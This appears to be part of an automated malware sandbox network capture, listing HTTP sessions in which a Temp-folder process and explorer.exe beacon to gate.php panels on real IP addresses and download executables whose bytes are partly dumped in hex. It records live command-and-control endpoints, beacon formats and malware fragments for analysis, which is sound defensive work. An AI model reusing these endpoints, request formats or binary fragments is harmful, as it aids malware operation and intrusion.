                                                                                                                                                                                                                                                                                        Data Ascii: P$PH$@9$PHD$pHc@<HL$`HHHc$PHk(HH$H$@H$IHT$`HHH$RH$`HHHD$ DLH$ ZMuA3HL$`K/HD$XH$H@0H$H+HH
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.727756023 CET896INData Raw: c8 48 8b c1 48 89 44 24 10 48 8b 44 24 10 0f b7 40 14 48 8b 4c 24 10 48 8d 44 01 18 48 89 04 24 48 8b 04 24 8b 40 14 39 44 24 30 73 09 8b 44 24 30 e9 9a 00 00 00 33 c0 66 89 44 24 08 eb 0d 0f b7 44 24 08 66 ff c0 66 89 44 24 08 0f b7 44 24 08 48
                                                                                                                                                                                                                                                                                        Data Ascii: HHD$HD$@HL$HDH$H$@9D$0sD$03fD$D$ffD$D$HL$I;}pD$Hk(H$D9D$0rTD$Hk(L$Hk(H$DH$D9D$0s,D$Hk(H$DL$0+L$Hk(H$Dq3H(HL$HhHD$8HD$H
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.727834940 CET1236INData Raw: 01 00 00 48 8b 8c 24 88 00 00 00 e8 4b fd ff ff 89 44 24 44 83 7c 24 44 00 75 05 e9 13 01 00 00 8b 84 24 90 00 00 00 c7 44 24 20 40 00 00 00 41 b9 00 30 00 00 44 8b c0 33 d2 48 8b 8c 24 80 00 00 00 ff 15 ab 45 00 00 48 89 44 24 48 48 83 7c 24 48
                                                                                                                                                                                                                                                                                        Data Ascii: H$KD$D|$Du$D$ @A0D3H$EHD$HH|$HuH$$H$HD$ DL$HT$HH$Eu$HL$@HL$ A DHT$HH$;Eu]D$DHL$HHHHD$XHD$hHD$
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.727848053 CET1236INData Raw: b9 70 17 00 00 ff 15 64 3f 00 00 eb e7 33 c0 48 83 c4 28 c3 cc cc cc cc cc cc cc 48 83 ec 38 ff 15 5a 41 00 00 85 c0 74 04 b0 01 eb 3b c7 44 24 20 00 00 00 00 ff 15 3c 41 00 00 48 8d 54 24 20 48 8b c8 ff 15 26 41 00 00 85 c0 74 19 83 7c 24 20 00
                                                                                                                                                                                                                                                                                        Data Ascii: pd?3H(H8ZAt;D$ <AHT$ H&At|$ tD$$D$$D$$2H8H8HA8HAHAHCHD$(D$ E3L33@P>H8HHH
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.848084927 CET1236INData Raw: 00 33 c0 48 81 c4 78 02 00 00 c3 cc cc cc cc cc cc cc cc cc cc cc cc 33 c0 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 44 89 4c 24 20 4c 89 44 24 18 48 89 54 24 10 48 89 4c 24 08 33 c0 c3 cc 48 89 4c 24 08 48 8b 44 24 08 8b 00 69 c0 0b a3 14 00 05
                                                                                                                                                                                                                                                                                        Data Ascii: 3Hx3DL$ LD$HT$HL$3HL$HD$iHL$HD$HL$WH3f$`H$bH3$pHL$PV<uCfD$PD$Pf$`:f$b\f$d3f$f


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        9192.168.2.1049926185.215.113.43807820C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:33.865273952 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                                                                        Content-Length: 31
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 64 31 3d 31 30 31 34 34 33 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                                                        Data Ascii: d1=1014439001&unit=246122658369
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:35.207360029 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:48:34 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        10192.168.2.104993131.41.244.11807820C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:35.348370075 CET62OUTGET /files/unique2/random.exe HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 31.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.675435066 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:48:36 GMT
                                                                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                        Content-Length: 1985024
                                                                                                                                                                                                                                                                                        Last-Modified: Thu, 12 Dec 2024 14:33:08 GMT
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        ETag: "675af424-1e4a00"
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 21 4a f8 9d 40 24 ab 9d 40 24 ab 9d 40 24 ab 83 12 a0 ab 81 40 24 ab 83 12 b1 ab 89 40 24 ab 83 12 a7 ab c5 40 24 ab ba 86 5f ab 94 40 24 ab 9d 40 25 ab f6 40 24 ab 83 12 ae ab 9c 40 24 ab 83 12 b0 ab 9c 40 24 ab 83 12 b5 ab 9c 40 24 ab 52 69 63 68 9d 40 24 ab 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 0c de dd 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 d4 02 00 00 b0 01 00 00 00 00 00 00 80 87 00 00 10 00 00 00 f0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 b0 87 00 00 04 00 00 f5 c2 1e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$!J@$@$@$@$@$@$_@$@%@$@$@$@$Rich@$PELd@ZBn@h! @T@.rsrch!@d@.idata B@ * B@ehftnwgk0@l(@unlnktmrp$@.taggant0"(@
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.675463915 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.675471067 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.675595045 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.675601959 CET1236INData Raw: df eb 6f 62 7b 6d 07 36 ba 83 69 01 db 99 70 76 00 9a 67 4e b8 f2 95 e0 19 e2 45 17 2c 54 98 09 5a 32 58 30 5f 0b 51 49 b3 48 de fa 3b ea d5 e9 74 5a 21 5b 6c 48 2d 51 64 2e f1 ad 5b 6b 68 fd 73 54 f9 4d 2f 1a 72 64 02 36 8d 54 23 f6 71 95 90 97
                                                                                                                                                                                                                                                                                        Data Ascii: ob{m6ipvgNE,TZ2X0_QIH;tZ![lH-Qd.[khsTM/rd6T#qUevApp5Gi]e|xs7v]Vd'}/JSeGOcx_!; |7]L[Ek{E[<"g/.1cQ:0@^K3 z5b
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.675611973 CET1236INData Raw: c0 f9 17 3c 6c 99 cd 4f 19 f8 4c dd b6 a1 ff 62 41 7a fe 60 a8 f4 72 b6 bf 28 2f 71 fb fe 39 05 30 21 a6 99 76 55 6a 51 8a 8c 6f 28 39 db 96 65 55 48 99 ce 29 84 1d 5d 60 0e 94 89 03 82 a5 d8 93 1e 49 fc 7d 68 fa 4d fa 99 7f 9c b7 6d 7f 89 f7 c1
                                                                                                                                                                                                                                                                                        Data Ascii: <lOLbAz`r(/q90!vUjQo(9eUH)]`I}hMmK=L&"Z^9Pa|!`)Y;x+VyKk"[e}i1f#=sq(epz)+sx2)MaXzwzv8Y\et[&W=l,
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.675617933 CET1236INData Raw: 48 25 e5 7c 9b 73 92 6e 4e 94 94 09 33 63 5f 6b f2 e8 7d 69 e3 68 0f ed 00 61 a9 73 db 8d d0 bd 7f 6d 55 71 98 89 55 1b 46 5c 84 39 70 21 a6 10 88 0e 95 7b cf c7 b8 21 0d 1b 57 06 68 52 51 b1 f2 de 91 97 ff 2d d8 60 ed 92 21 c0 72 9a b9 0c 89 7c
                                                                                                                                                                                                                                                                                        Data Ascii: H%|snN3c_k}ihasmUqUF\9p!{!WhRQ-`!r|pXZ[r;}blMfrs@JcTh&ajc`hZ="8%bM&jG[gG(jYn8gv#t~ yQmfQM@WH-WyPX_<[N2W
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.675818920 CET1236INData Raw: 7b 9a 25 45 67 09 5d b2 1c 8b ee cb de 96 79 df e8 d1 1e 01 89 9f 16 13 f8 dd 8e 43 1e 28 b5 a5 63 59 05 54 c7 40 3b 15 bf eb 15 6c 7c 03 60 29 f1 df 77 1e e2 f6 ca 4c 8b 92 20 70 78 dd 30 6f 09 ab 8a 8e 4a 88 28 6d d8 80 ab e9 57 50 ab 81 84 af
                                                                                                                                                                                                                                                                                        Data Ascii: {%Eg]yC(cYT@;l|`)wL px0oJ(mWPk=Hn!{v}Rd7ur)Nj^oCuB2lAFR*?!5yuqHWC<B;%kzqyH g]U>]HM7!3 =?|^syJy>VZa>
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.675825119 CET1236INData Raw: 1e d1 43 cd 80 89 1a b4 bb 60 22 f3 5f 22 65 31 29 69 4b 45 42 78 57 55 0b 7b 82 4b 10 50 c5 d0 f6 e4 fb ac 5c 9e 59 bb bf 48 33 2d b8 15 2e 2f 9b 99 5c 57 13 86 fa 5a e2 36 c8 40 88 ca 6d 9d 72 4a 5f 55 bf 64 58 73 7b 02 30 fe f0 68 b9 51 06 0a
                                                                                                                                                                                                                                                                                        Data Ascii: C`"_"e1)iKEBxWU{KP\YH3-./\WZ6@mrJ_UdXs{0hQF{5OQtez$5cv!O<M[9s*SQTz`]EM2]?8{QOjv'6DOv78g9M\P)DDZxP&BJFlR2@\2fX
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.675837994 CET556INData Raw: 4e a4 f5 f3 49 fd 72 0f 8c 04 2c ef 9e 9c f4 bf 5c 0a 85 e9 03 43 20 a7 c8 b4 bc 0a 72 57 c9 3b b9 59 85 0b da 9f 2e 83 12 a1 6d c7 4a 82 a6 50 1b 73 60 bb df 36 24 99 10 46 37 3b 7c 04 4b 40 7c ba cc 66 6f 6b 25 c9 77 46 90 b5 34 fa 71 6f 0a 42
                                                                                                                                                                                                                                                                                        Data Ascii: NIr,\C rW;Y.mJPs`6$F7;|K@|fok%wF4qoBiR(M&"Fqd#8wN@%A`(h7q#%=ih.9:S.au|j FekiIU[._,5+0=]yqhJz}?EQ\}9zzm=
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.796211004 CET1236INData Raw: 0a 9a b8 ed 99 ea c4 94 88 94 70 71 96 03 21 4c f3 f6 4c 4d e4 13 eb 63 30 1b a4 f7 3b e4 b8 6b 7c f5 e3 ed 0a 41 72 92 c5 bf 57 06 a4 ba 82 42 9e 24 5a 3a 77 04 3c 92 29 6b d0 6a 7e 9b a0 01 7c f6 30 c2 01 d3 bb ec 83 6d 9d 9a 20 38 ac 06 3d 8e
                                                                                                                                                                                                                                                                                        Data Ascii: pq!LLMc0;k|ArWB$Z:w<)kj~|0m 8=MV'LRaFy)dbOyO%#WYN#p=A)>Nnl>gK3JvL.g`[e]pnG7shuZn>BQZZK5y<otbAc;


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        11192.168.2.1049933185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:35.856524944 CET264OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.185195923 CET257INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:48:36 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 40
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Data Raw: 35 32 36 62 39 30 39 36 37 61 31 62 37 35 39 39 36 34 30 35 34 64 32 30 62 37 36 65 36 66 34 66 35 37 34 31 63 31 64 62
                                                                                                                                                                                                                                                                                        Data Ascii: 526b90967a1b759964054d20b76e6f4f5741c1db


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        12192.168.2.1049938185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.308089018 CET284OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 33
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.429929018 CET33OUTData Raw: 57 5d 42 1e 0b 1e 0b 4a 06 51 4d 52 4b 05 45 09 4a 76 62 7a 7f 49 62 73 1e 55 44 0a 5d 1a 05 1a 02
                                                                                                                                                                                                                                                                                        Data Ascii: W]BJQMRKEJvbzIbsUD]
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.966101885 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:48:37 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        13192.168.2.1049943185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.089097977 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.209259987 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:40.865557909 CET315INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:48:39 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 98
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Data Raw: 05 4e 5e 16 4d 40 03 19 18 50 09 57 19 0d 08 17 00 0c 1e 04 00 53 1d 53 16 4f 18 00 4e 03 39 6c 05 4b 5c 45 17 41 5e 4d 1a 03 0e 57 17 08 08 18 01 59 1f 53 03 02 16 5f 55 4c 53 4d 1a 01 4a 55 6f 3d 06 19 5e 12 40 16 0f 18 1b 00 5b 04 4a 5a 04 1c 00 5a 17 01 0d 01 18 17 47 14 19 50 41 5c 3b 3e
                                                                                                                                                                                                                                                                                        Data Ascii: N^M@PWSSON9lK\EA^MWYS_ULSMJUo=^@[JZZGPA\;>


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        14192.168.2.1049946185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:40.987169027 CET232OUTGET /ctx.exe HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.321104050 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:48:41 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 15:45:48 GMT
                                                                                                                                                                                                                                                                                        ETag: "5a452c-628ec5ffff268"
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        Content-Length: 5915948
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: application/x-msdownload
                                                                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1c 09 0d a3 58 68 63 f0 58 68 63 f0 58 68 63 f0 13 10 60 f1 5f 68 63 f0 13 10 66 f1 ec 68 63 f0 13 10 67 f1 52 68 63 f0 9b eb 9e f0 5b 68 63 f0 9b eb 60 f1 51 68 63 f0 9b eb 67 f1 49 68 63 f0 9b eb 66 f1 70 68 63 f0 13 10 62 f1 53 68 63 f0 58 68 62 f0 c9 68 63 f0 4b ec 67 f1 41 68 63 f0 4b ec 61 f1 59 68 63 f0 52 69 63 68 58 68 63 f0 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 2c 62 58 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 28 00 94 02 00 00 58 02 00 00 00 00 00 d0 c0 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 05 00 00 04 00 00 2a 4f [TRUNCATED]
                                                                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$XhcXhcXhc`_hcfhcgRhc[hc`QhcgIhcfphcbShcXhbhcKgAhcKaYhcRichXhcPEd,bXg"(X@*OZ`lx`"h@P.text `.rdataB&(@@.datas@.pdata"`$@@.rsrc@@.reloch@B
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.321244001 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                        Data Ascii: H(/H'HHHHHH($HqCH\$Hl$ LD$VWATAUAWH H3HDIHA.L
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.321408987 CET1236INData Raw: 48 85 c0 75 15 48 8d 56 12 48 8d 0d da a7 02 00 e8 4d 15 00 00 e9 02 01 00 00 8b 56 04 45 33 c0 48 03 93 00 10 00 00 49 8b cc e8 37 e9 00 00 85 c0 79 1c 4c 8d 46 12 48 8d 15 e4 a7 02 00 48 8d 0d 19 a8 02 00 e8 88 16 00 00 e9 af 00 00 00 8b 4e 0c
                                                                                                                                                                                                                                                                                        Data Ascii: HuHVHMVE3HI7yLFHHN0LHu DNLFHHX~uME3HIW^Lt$PMHt; DH;HMAHGIH^HrhL H+uH|$`Lt$Pt
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.321463108 CET1236INData Raw: 48 48 8b 6c 24 40 4c 8b 64 24 50 85 c0 74 0b 49 8b ce e8 e3 2b 01 00 45 33 f6 49 8b cf e8 e8 dd 00 00 48 8b 5c 24 58 49 8b c6 48 83 c4 20 41 5f 41 5e 5e c3 4c 8d 46 12 48 8d 15 57 a2 02 00 48 8d 0d 84 a2 02 00 e8 b3 11 00 00 b8 ff ff ff ff eb aa
                                                                                                                                                                                                                                                                                        Data Ascii: HHl$@Ld$PtI+E3IH\$XIH A_A^^LFHWH@SWH8znHHu$xyHWH_H8_[HnLd$`Ie)LHu(LGHRH6Ld$`H8_[H2L|$ H!)LH
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.321472883 CET1236INData Raw: 2c 4c 8d 05 ee 9f 02 00 0f c8 89 44 24 2c ba 40 00 00 00 8b 44 24 30 0f c8 89 44 24 30 8b 44 24 34 0f c8 89 44 24 34 89 83 1c 10 00 00 e8 88 01 00 00 8b 44 24 28 45 33 c0 48 2b f0 48 8b cf 48 8d 46 58 48 89 83 00 10 00 00 8b 54 24 2c 48 03 d0 e8
                                                                                                                                                                                                                                                                                        Data Ascii: ,LD$,@D$0D$0D$4D$4D$(E3H+HHFXHT$,HhL$0&HHuHHeT$0LAHHsH}HJyD$0HHH*tHgHH;
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.321646929 CET1236INData Raw: 50 20 00 00 48 8b 8f 28 20 00 00 ba 72 01 00 00 41 b8 01 00 00 00 ff 15 1a 95 02 00 4c 8b 87 48 20 00 00 4d 85 c0 74 72 48 8b 4f 08 ba 30 00 00 00 41 b9 01 00 00 00 ff 15 f9 94 02 00 4c 8b 87 48 20 00 00 41 b9 01 00 00 00 48 8b 8f 30 20 00 00 ba
                                                                                                                                                                                                                                                                                        Data Ascii: P H( rALH MtrHO0ALH AH0 0LH AH8 0LH AH@ 0H0 LO(E3LO E3H8 jHOHT$`tDD$lHT$hfD+D$d
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.321660042 CET1236INData Raw: 24 50 4c 8d 0d 49 fc ff ff 48 8d 44 24 30 45 33 c0 48 8d 95 a0 1f 00 00 48 89 44 24 20 48 8b cf ff 15 2c 90 02 00 48 8b 4c 24 40 48 8b d8 e8 4b 1d 01 00 48 8b 4c 24 48 e8 41 1d 01 00 48 8b 4c 24 50 e8 37 1d 01 00 48 8b 8d 78 1f 00 00 48 85 c9 74
                                                                                                                                                                                                                                                                                        Data Ascii: $PLIHD$0E3HHD$ H,HL$@HKHL$HAHL$P7HxHtHHtH H3H!A^_^[]H\$Hl$Ht$H|$ AVH 3IHDHtE33bHHtE33HaLHtE33HaH
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.321670055 CET1236INData Raw: 24 30 4c 8b cb 48 c7 44 24 20 00 00 00 00 41 b8 00 04 00 00 48 8b 08 48 83 c9 02 e8 d2 13 01 00 41 b8 00 04 00 00 48 8d 94 24 30 04 00 00 48 8d 4c 24 30 e8 c6 5d 00 00 33 c9 41 b9 30 00 00 00 48 85 c0 74 17 4c 8d 05 52 93 02 00 48 8d 94 24 30 04
                                                                                                                                                                                                                                                                                        Data Ascii: $0LHD$ AHHAH$0HL$0]3A0HtLRH$0LHT$0H$0H3@HH_[LIKISMCMK SWHHHH3H$0HI{H|$(HT$0LHD$ AHHVA0
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.321676016 CET1236INData Raw: 02 00 e8 63 f8 ff ff b8 ff ff ff ff e9 6b 01 00 00 48 89 9c 24 98 10 00 00 48 8b 9e 08 10 00 00 48 89 ac 24 a0 10 00 00 48 89 bc 24 a8 10 00 00 4c 89 b4 24 60 10 00 00 48 3b 9e 10 10 00 00 0f 83 15 01 00 00 0f 1f 44 00 00 80 7b 11 73 0f 85 eb 00
                                                                                                                                                                                                                                                                                        Data Ascii: ckH$HH$H$L$`H;D{sHH[HHxLsLt$(M" LD$ \HL$P=)HHL$P$H%IHLHHHSHH
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.321764946 CET1236INData Raw: 48 8d 84 24 d0 00 00 00 48 8b cd 4c 8d 8c 24 d0 10 00 00 48 89 44 24 20 4c 8d 84 24 d0 20 00 00 48 8d 54 24 30 e8 bc 08 00 00 eb 40 4c 8d 47 12 48 8d 94 24 d0 10 00 00 48 8d 8c 24 d0 20 00 00 e8 61 0b 00 00 41 3b c4 48 8d b4 24 d0 10 00 00 41 0f
                                                                                                                                                                                                                                                                                        Data Ascii: H$HL$HD$ L$ HT$0@LGH$H$ aA;H$ADL$HIu+HIHI;8H'HWHVHHwAH$ 1L$0L$0L$0H$(1H$
